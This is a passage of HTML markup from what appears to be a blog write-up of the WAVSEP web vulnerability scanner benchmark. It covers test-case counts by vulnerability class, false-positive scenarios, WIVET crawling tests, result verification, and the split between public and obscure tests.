&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;184&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that included &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Hidden, Obsolete
and Backup files&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;816&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that were vulnerable to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Path
Traversal&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; attacks.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;108&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that were vulnerable to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;(XSS
via) Remote File Inclusion&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; attacks.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;66&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that were vulnerable to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Reflected
Cross Site Scripting&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; attacks.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;80&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that contained &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Error Disclosing
SQL Injection&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; exposures.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;46&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that contained &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Blind SQL
Injection&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; exposures.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;10&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that were vulnerable to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Time
Based SQL Injection&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; attacks.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The various scanners were also tested against a variety
of &lt;b&gt;false positive&lt;/b&gt; scenarios:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;9&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Unvalidated
Redirect &lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;3&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Obsolete/Hidden/Backup
files&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;8&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Path
Traversal / LFI&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;6&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Remote
File Inclusion&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;7 &lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Reflected
XSS&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;10 &lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;different categories of false positive &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;SQL
Injection&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 16.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Overall, a collection of &lt;b&gt;1413&lt;/b&gt; vulnerable &lt;b&gt;test
cases&lt;/b&gt; for &lt;b&gt;6&lt;/b&gt; different &lt;b&gt;attack vectors&lt;/b&gt;, each test case
simulating a different and &lt;b&gt;unique&lt;/b&gt; scenario that may exist in an
application.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_3&quot;
 o:spid=&quot;_x0000_i1061&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:264pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image003.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKu9Wi1RqLY0lD6eDIrv1EzRKydkreR83by7eqUjPx-GEqlA7-JiYNz7YQl-aoV_oUabGmTS7_3f_Qz5psNHDP5mCJJAA_KJbiP2rWD2_wwPE5dtIM1mwsIzrQqNIbVJdb8DPmlz9_Hlc/s1600/1%2529+Wavsep+Picture+1png.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKu9Wi1RqLY0lD6eDIrv1EzRKydkreR83by7eqUjPx-GEqlA7-JiYNz7YQl-aoV_oUabGmTS7_3f_Qz5psNHDP5mCJJAA_KJbiP2rWD2_wwPE5dtIM1mwsIzrQqNIbVJdb8DPmlz9_Hlc/s1600/1%2529+Wavsep+Picture+1png.png&quot; height=&quot;406&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Although the testing platform included a variety of
experimental test cases for similar and different vulnerabilities (DOM-XSS,
information disclosure issues, etc), these were not included in the scope of
the benchmark, and their results did not affect the final score.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Attack Surface Coverage Assessment&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to assess the scanners attack surface coverage, the
assessment included tests that measure the efficiency of the scanner&#39;s
automated crawling mechanism (input vector extraction) , and feature
comparisons meant to assess its support for various technologies and its
ability to handle different scan barriers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This section of the benchmark also included the &lt;b&gt;&lt;a href=&quot;https://code.google.com/p/wivet/&quot;&gt;WIVET&lt;/a&gt;&lt;/b&gt; test (Web Input Vector
Extractor Teaser v3-rev148), in which scanners were executed against a
dedicated application that can assess their crawling mechanism efficiency in
the aspect of input vector extraction. The specific details of this assessment
are provided in the relevant section.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Verification&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to ensure the result consistency, the directory of
each exposure sub category was individually scanned multiple times using
various configurations (for the vast &lt;b&gt;majority&lt;/b&gt; of tested products),
usually using a single thread and using a scan policy that only included the
relevant plugins.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to ensure that the detection features of each
scanner were truly effective, &lt;b&gt;most&lt;/b&gt; of the scanners were tested against
an &lt;b&gt;additional benchmarking&lt;/b&gt; application that was prone to the same
vulnerable test cases as the &lt;b&gt;WAVSEP&lt;/b&gt; platform, but had a different
design, slightly different behavior and different entry point format, in order
to verify that no signatures were used, and that any improvement was due to the
enhancement of the scanner&#39;s attack tree.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Furthermore, in order to verify that all &lt;b&gt;WIVET&lt;/b&gt;
results were reliable, the vast &lt;b&gt;majority&lt;/b&gt; of tools were also tested
against an unpublished online version of WIVET that included additional enhancements
that prevent pre-adaptation to the platform URLs (&lt;/span&gt;&lt;a href=&quot;http://wivet.webscantest.com/&quot;&gt;http://wivet.webscantest.com/&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Finally, since the test was performed with the aid of
several volunteers, some results were verified by more than one person and on
multiple environments.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Making the Results Useful to Vendors&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to help vendors understand which scenarios were &quot;missed&quot;
by their products, the list of identified test cases &lt;b&gt;was documented in
detail&lt;/b&gt;, for each class of vulnerabilities, and the list of test cases that
were missed can be deducted from that list. Since WAVSEP contains detailed
documentation on each and every test case, this information can help vendors
identify their weaknesses and cover prominent scenarios.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Refer to the scan description section (click the version
link) of each scanner in &lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com&lt;/a&gt;
to locate exactly which test cases were identified by each scanner.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Public tests vs. Obscure tests&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to make the test as fair as possible, while still
enabling the various vendors to show improvement, the benchmark was divided
into tests that were &lt;b&gt;publically announced&lt;/b&gt;, and tests that were &lt;b&gt;obscure
to all vendors&lt;/b&gt;:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Publically announced tests:&lt;/b&gt; the various feature comparisons,
the WIVET assessment and the detection accuracy assessment of the &lt;b&gt;&lt;i&gt;SQL
Injection&lt;/i&gt;&lt;/b&gt;, &lt;b&gt;&lt;i&gt;Reflected Cross Site Scripting&lt;/i&gt;&lt;/b&gt;, &lt;b&gt;&lt;i&gt;Path
Traversal/LFI&lt;/i&gt;&lt;/b&gt; and &lt;b&gt;&lt;i&gt;(XSS via) Remote File Inclusion&lt;/i&gt;&lt;/b&gt; were well
known to all vendors, and already published as a part of WAVSEP v1.2 (which was
available online for the last year and a half).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Tests that were obscure to all vendors&lt;/b&gt; &lt;b&gt;until
the moment of the publication&lt;/b&gt;: the detection accuracy assessment of the &lt;b&gt;Unvalidated
Redirect &lt;/b&gt;and&lt;b&gt; Obsolete/Hidden File Detection&lt;/b&gt; implemented as &lt;b&gt;256+&lt;/b&gt;
&lt;b&gt;NEW&lt;/b&gt; test cases in &lt;b&gt;WAVSEP 1.5&lt;/b&gt; (a new version that was only
published alongside this benchmark).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results of the main test categories are presented within
three graphs (commercial/SAAS graph, free &amp;amp; open source graph, unified
graph), and the detailed information of each test is presented in a dedicated
section in benchmark presentation platform at &lt;/span&gt;&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;4. A Glimpse to the Results of the Benchmark&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;This presentation of results in this benchmark, alongside
the dedicated result presentation website (&lt;/span&gt;&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;) and a series of supporting articles and methodologies, are
all designed to help the reader to &lt;b&gt;make a decision&lt;/b&gt; - to choose the
proper product/s or tool/s for the task at hand, within the borders of the time
or budget.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A summary of the most significant results can be seen in the
following links, and filtered according to the product license
(commercial/opensource): &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
